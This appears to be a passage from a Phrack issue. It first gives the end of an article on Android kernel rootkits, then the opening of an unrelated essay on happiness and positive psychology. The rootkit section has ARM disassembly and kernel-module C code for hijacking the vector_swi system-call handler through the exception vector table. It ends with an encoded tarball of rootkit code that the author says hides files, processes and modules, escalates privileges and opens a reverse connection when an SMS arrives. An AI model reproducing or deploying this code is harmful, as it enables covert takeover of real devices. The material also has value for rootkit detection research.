exception vector table without changing sys_call_table and vector_swi
handler.


--[ 5.1 - exception vector table

Exception vector table contains the address of various exception handler
routines, branch code array and processing codes to call the exception
handler routine. These are declared in entry-armv.S, copied to the point of
the high vector(0xffff0000) by early_trap_init() routine within traps.c
code, and make one exception vector table.

traps.c:
void __init early_trap_init(void)
{
	unsigned long vectors = CONFIG_VECTORS_BASE; /* 0xffff0000 */
	extern char __stubs_start[], __stubs_end[];
	extern char __vectors_start[], __vectors_end[];
	extern char __kuser_helper_start[], __kuser_helper_end[];
	int kuser_sz = __kuser_helper_end - __kuser_helper_start;

	/*
	 * Copy the vectors, stubs and kuser helpers
	(in entry-armv.S)
	 * into the vector page, mapped at 0xffff0000,
	and ensure these
	 * are visible to the instruction stream.
	 */
	memcpy((void *)vectors, __vectors_start,
	__vectors_end - __vectors_start);
	memcpy((void *)vectors + 0x200, __stubs_start,
	__stubs_end - __stubs_start);

After the processing codes are copied in order by early_trap_init()
routine, the exception vector table is initialized, then one exception
vector table is made as follows.

# ./coelacanth -e
[000] ffff0000: ef9f0000 [Reset]          ; svc 0x9f0000 branch code array
[004] ffff0004: ea0000dd [Undef]          ; b   0x380
[008] ffff0008: e59ff410 [SWI]            ; ldr pc, [pc, #1040] ; 0x420
[00c] ffff000c: ea0000bb [Abort-perfetch] ; b   0x300
[010] ffff0010: ea00009a [Abort-data]     ; b   0x280
[014] ffff0014: ea0000fa [Reserved]       ; b   0x404
[018] ffff0018: ea000078 [IRQ]            ; b   0x608
[01c] ffff001c: ea0000f7 [FIQ]            ; b   0x400
[020] Reserved
... skip ...
[22c] ffff022c: c003dbc0 [__irq_usr] ; exception handler routine addr array
[230] ffff0230: c003d920 [__irq_invalid]
[234] ffff0234: c003d920 [__irq_invalid]
[238] ffff0238: c003d9c0 [__irq_svc]
[23c] ffff023c: c003d920 [__irq_invalid]
...
[420] ffff0420: c003df40 [vector_swi]

When software interrupt occurs, 4 byte instruction at 0xffff0008 is
executed. The code copies the present pc to the address of exception
handler and then branches. In other words, it branches to the vector_swi
handler routine at 0x420 of exception vector table.


--[ 5.2 - Hooking techniques changing vector_swi handler

The hooking technique changing the vector_swi handler is the first one that
will be introduced. It changes the address of exception handler routine
that processes software interrupt within exception vector table and calls
the vector_swi handler routine forged by an attacker.

	1. Generate the copy version of sys_call_table in kernel heap and
	   then change the address of routine as aforementioned.
	2. Copy not all vector_swi handler routine but the code before
	   handling sys_call_table to kernel heap for simple hooking.
	3. Fill the values with right values for the copied fake vector_swi
	   handler routine to act normally and change the code to call the
	   address of sys_call_table copy version. (generated in step 1)
	4. Jump to the next position of sys_call_table handle code of
	   original vector_swi handler routine.
	5. Change the address of vector_swi handler routine of exception
	   vector table to the address of fake vector_swi handler code.

The completed fake vector_swi handler has a code like following.

00000000 <new_vector_swi>:
    00: e24dd048 sub     sp, sp, #72     ; 0x48
    04: e88d1fff stmia   sp, {r0 - r12}
    08: e28d803c add     r8, sp, #60     ; 0x3c
    0c: e9486000 stmdb   r8, {sp, lr}^
    10: e14f8000 mrs     r8, SPSR
    14: e58de03c str     lr, [sp, #60]
    18: e58d8040 str     r8, [sp, #64]
    1c: e58d0044 str     r0, [sp, #68]
    20: e3a0b000 mov     fp, #0  ; 0x0
    24: e3180020 tst     r8, #32 ; 0x20
    28: 12877609 addne   r7, r7, #9437184
    2c: 051e7004 ldreq   r7, [lr, #-4]
 [*]30: e59fc020 ldr     ip, [pc, #32]  ; 0x58 <__cr_alignment>
    34: e59cc000 ldr     ip, [ip]
    38: ee01cf10 mcr     15, 0, ip, cr1, cr0, {0}
    3c: f1080080 cpsie   i
    40: e1a096ad mov     r9, sp, lsr #13
    44: e1a09689 mov     r9, r9, lsl #13
 [*]48: e59f8000 ldr     r8, [pc, #0]
 [*]4c: e59ff000 ldr     pc, [pc, #0]
 [*]50: <hacked_sys_call_table address>
 [*]54: <vector_swi address to jmp>
 [*]58: <__cr_alignment routine address referring at 0x30>

The asterisk parts are the codes modified or added to the original code. In
addition to the part that we modified to make the code refer __cr_alignment
function, I added some instructions to save address of sys_call_table copy
version to r8 register, and jump back to the original vector_swi handler
function. Following is the attack code written as a kernel module.

static unsigned char new_vector_swi[500];
...

void make_new_vector_swi(){
	void *swi_addr=(long *)0xffff0008;
	void *vector_swi_ptr=0;
	unsigned long offset=0;
	unsigned long *vector_swi_addr=0,orig_vector_swi_addr=0;
	unsigned long add_r8_pc_addr=0;
	unsigned long ldr_ip_pc_addr=0;
	int i;

	offset=((*(long *)swi_addr)&0xfff)+8;
	vector_swi_addr=*(unsigned long *)(swi_addr+offset);
	vector_swi_ptr=swi_addr+offset; /* 0xffff0420 */
	orig_vector_swi_addr=vector_swi_addr; /* vector_swi's addr */

	/* processing __cr_alignment */
	while(vector_swi_addr++){
		if(((*(unsigned long *)vector_swi_addr)&
		0xfffff000)==0xe28f8000){
			add_r8_pc_addr=(unsigned long)vector_swi_addr;
			break;
		}
		/* get __cr_alingment's addr */
		if(((*(unsigned long *)vector_swi_addr)&
		0xfffff000)==0xe59fc000){
			offset=((*(unsigned long *)vector_swi_addr)&
			0xfff)+8;
			ldr_ip_pc_addr=*(unsigned long *)
			((char *)vector_swi_addr+offset);
		}
	}
	/* creating fake vector_swi handler */
	memcpy(new_vector_swi,(char *)orig_vector_swi_addr,
	(add_r8_pc_addr-orig_vector_swi_addr));
	offset=(add_r8_pc_addr-orig_vector_swi_addr);
	for(i=0;i<offset;i+=4){
		if(((*(long *)&new_vector_swi[i])&
		0xfffff000)==0xe59fc000){
			*(long *)&new_vector_swi[i]=0xe59fc020;
			// ldr ip, [pc, #32]
			break;
		}
	}
	/* ldr r8, [pc, #0] */
	*(long *)&new_vector_swi[offset]=0xe59f8000;
	offset+=4;
	/* ldr pc, [pc, #0] */
	*(long *)&new_vector_swi[offset]=0xe59ff000;
	offset+=4;
	/* fake sys_call_table */
	*(long *)&new_vector_swi[offset]=hacked_sys_call_table;
	offset+=4;
	/* jmp original vector_swi's addr */
	*(long *)&new_vector_swi[offset]=(add_r8_pc_addr+4);
	offset+=4;
	/* __cr_alignment's addr */
	*(long *)&new_vector_swi[offset]=ldr_ip_pc_addr;
	offset+=4;

	/* change the address of vector_swi handler
	   within exception vector table */
	*(unsigned long *)vector_swi_ptr=&new_vector_swi;

	return;
}

This code gets the address which processes the sys_call_table within
vector_swi handler routine and then copies original contents of vector_swi
to the fake vector_swi variable before the address we obtained. After
changing some parts of fake vector_swi to make the code refer _cr_alignment
function address correctly, we need to add instructions that save the
address of sys_call_table copy version to r8 register and jump back to the
original vector_swi handler function. Finally, hooking starts when we
modify the address of vector_swi handler function within exception vector
table.


--[ 5.3 - Hooking techniques changing branch instruction offset

The second hooking technique to change the branch instruction offset within
exception vector table is that we don't change vector_swi handler and
change the offset of 4 byte branch instruction code called automatically
when the software interrupt occurs.

	1. Proceed to step 4 like the way in section 5.1.
	2. Store the address of generated fake vector_swi handler routine
	   in the specific area within exception vector table.
	3. Change 1 byte which is an offset of 4 byte instruction codes at
	   0xffff0008 and store.

The code compared with section 5.2 is as follows.

- *(unsigned long *)vector_swi_ptr=&new_vector_swi;
...
+ *(unsigned long *)(vector_swi_ptr+4)=&new_vector_swi; /* 0xffff0424 */
...
+ *(unsigned long *)swi_addr+=4; /* 0xe59ff410 -> 0xe59ff414 */

The changed exception vector table after hooking is as follows.

# ./coelacanth -e
[000] ffff0000: ef9f0000 [Reset]          ; svc 0x9f0000 branch code array
[004] ffff0004: ea0000dd [Undef]          ; b   0x380
[008] ffff0008: e59ff414 [SWI]            ; ldr pc, [pc, #1044] ; 0x424
[00c] ffff000c: ea0000bb [Abort-perfetch] ; b   0x300
[010] ffff0010: ea00009a [Abort-data]     ; b   0x280
[014] ffff0014: ea0000fa [Reserved]       ; b   0x404
[018] ffff0018: ea000078 [IRQ]            ; b   0x608
[01c] ffff001c: ea0000f7 [FIQ]            ; b   0x400
[020] Reserved
... skip ...
[420] ffff0420: c003df40 [vector_swi]
[424] ffff0424: bf0ceb5c [new_vector_swi] ; fake vector_swi handler code

Hooking starts when the address of a fake vector_swi handler code is stored
at 0xffff0424 and the 4 byte branch instruction offset at 0xffff0008
changes the address around 0xffff0424 for reference.


--[ 6 - Conclusion

One more time, I thank many pioneers for their devotion and inspiration.
I also hope various Android rootkit researches to follow. It is a pity
that I couldn't cover all the ideas that occurred in my mind during
writing this paper. However, I also think that it is better to discuss
the advanced and practical techniques next time -if you like this one ;-)-.

For more information, the attached example code provides not only file &
process hiding and kernel module hiding features but also the classical
rootkit features such as admin privilege succession to specific gid user
and process privilege changing. I referred to the Defcon 18 whitepaper of
Christian Papathanasiou and Nicholas J. Percoco for performing the reverse
connection when we receive a sms message from an appointed phone number.

Thanks to:
vangelis and GGUM for translating Korean into English. Other than those who
helped me on this paper, I'd like to thank my colleagues, people in my
graduate school and everyone who knows me.


--[ 7 - References

 [1] "Abuse of the Linux Kernel for Fun and Profit" by halflife
     [Phrack issue 50, article 05]

 [2] "Weakening the Linux Kernel" by plaguez
     [Phrack issue 52, article 18]

 [3] "RUNTIME KERNEL KMEM PATCHING" by Silvio Cesare
     [runtime-kernel-kmem-patching.txt]

 [4] "Linux on-the-fly kernel patching without LKM" by sd & devik
     [Phrack issue 58, article 07]

 [5] "Handling Interrupt Descriptor Table for fun and profit" by kad
     [Phrack issue 59, article 04]

 [6] "trojan eraser or i want my system call table clean" by riq
     [Phrack issue 54, article 03]

 [7] "yet another article about stealth modules in linux" by riq
     ["abtrom: anti btrom" in a mail to Bugtraq]

 [8] "Saint Jude, The Model" by Timothy Lawless
     [http://prdownloads.sourceforge.net/stjude/StJudeModel.pdf]

 [9] "IA32 ADVANCED FUNCTION HOOKING" by mayhem
     [Phrack issue 58, article 08]

[10] "Android LKM Rootkit" by fred
     [http://upche.org/doku.php?id=wiki:rootkit]

[11] "This is not the droid you're looking for..." by Trustwave
     [DEFCON-18-Trustwave-Spiderlabs-Android-Rootkit-WP.pdf]


--[ 8 - Appendix: earthworm.tgz.uu

I attach a demo code to demonstrate the concepts which I explained in this
paper. This code can be used as a real code for attack or just a proof-of-
concept code. I wish you use this code only for your study not for a bad
purpose.

<++> earthworm.tgz.uu
begin-base64 644 earthworm.tgz
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
====
<-->

--[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x07 of 0x13

|=-----------------------------------------------------------------------=|
|=-------------------------=[ Happy Hacking ]=---------------------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by Anonymous ]=---------------------------=|
|=-----------------------------------------------------------------------=|

                                  -------

1. Introduction

2. The Happiness Hypothesis

3. The consulting industry

4. Rebirth

5. Conclusions

6. References

                                  -------

--[ 1 - Introduction

I've been fascinated with happiness since my college days. Prior to 1998
psychology focused on fixing people who had problems in an attempt to make
them more "normal". However, recent trends in psychology have brought a
whole new field called positive psychology. Positive psychology, or the
science of Happiness, brings a wealth of research on how normal people can
achieve greater levels of happiness. As you delve into the subject you will
discover that most of the conclusions associated with the research into the
topic of happiness actually runs counter to the popular culture
understanding of what brings happiness.

In this article I'd like to expose some ideas that directly impact the
hacking scene and specifically as it relates to working in the security
industry. I'd also like to introduce the idea of hacking happiness.

If you could spend a percentage of your time learning about happiness, how
much happier do you think you could be? Hacking happiness means cutting the
path to happiness straight to what makes you happy by researching happiness
just like you would any security topic.

Since the article is focused on Happiness as it relates to hacking, there
are many subjects of positive psychology that we are not going to touch or
mention. However, if you are interested in reading more about the field,
Wikipedia has an excellent article on the subject:

  - http://en.wikipedia.org/wiki/Positive_psychology


--[ 2 - The Happiness Hypothesis

Most of the ideas introduced by this article are borrowed from "The
Happiness Hypothesis" by Jonathan Haidt, which I recommend if you'd like to
dig deeper into the subject.

The first thing about happiness that you should know that research has
proved is:

  - "People are very bad at predicting what will bring them happiness." -

To expose this idea let me provide an example. Researchers took a look at 2
different groups of people that had been through completely opposite
situations, the first group are lottery winners, and the second group are
people that became paraplegics through some type of accident. Both groups
were interviewed at 2 different times, once just after the event (winning
the lottery or becoming paraplegic), and once more again several years
later. The results of their interviews are quite astonishing.

The first group, the lottery winners, as you might expect, had very high
happiness levels when interviewed shortly after they had won the lottery.
The second group, those who were newly paralyzed had a very low level of
happiness, some were even so unhappy that they regretted not dying during
the accident. These findings are quite obvious and shouldn't be surprising
to you; however what is astonishing are the results of the second
interview.

Years later, the lottery winners were interviewed again, this time the
results were quite surprising. As it turns out, their happiness level had
dropped significantly to levels so low that most of the winners where more
unhappy now than before winning the lottery. In contrast, the happiness of
the group of paraplegics was very high, equal to or higher than before the
accident. So what really happened?

To explain this, let me describe the circumstances of the lottery winners.
Having won the lottery, they thought they had achieved everything they
wanted, since popular culture equates happiness with material wealth, and
so their short term happiness level grew quite high. After some time
though, they started to realize that the money wasn't bringing them the
happiness they once thought they would achieve when they would be rich.
Frustrated at the possibility that they would never be able to achieve full
happiness, their happiness level started dropping. To try to compensate for
their decreasing happiness level, they started spending money on material
things, but that was no longer a happiness source. Further exacerbating the
problem, this new wealth brought new problems (to quote Notorious B.I.G. -
"Mo money mo problems"). Now family, friends and colleagues were regarded
as a threat, thinking that all they wanted is to take advantage of their
new wealth. People around them started asking for loans and favors, which
led them to distant themselves from their families and friends. Again, in
order to compensate, they started trying to make new friends that had their
own wealth status. But breaking the bonds with old friends and family that
had been established for most of their lives and trying to establish new
ones, brought a feeling of loneliness that directly correlates to their
happiness levels significantly dropping.

On the other hand those who had become paraplegics relied heavily on their
families and friends to help them through the rough times, thus 
strengthening the bonds between them. And just like the lottery winners,
the new circumstances brought back old friends from the past. But unlike
with lottery winners who's friends came back looking to take advantage of
their new wealth, these old friends came back for the opposite; they sought
to help. Another factor associated with the increased happiness was the 
fact that the group that was paralyzed had to learn to cope with being 
paraplegics. Learning to cope with being paraplegics brought an immense
sense of achievement that made their happiness levels go up.  After a few
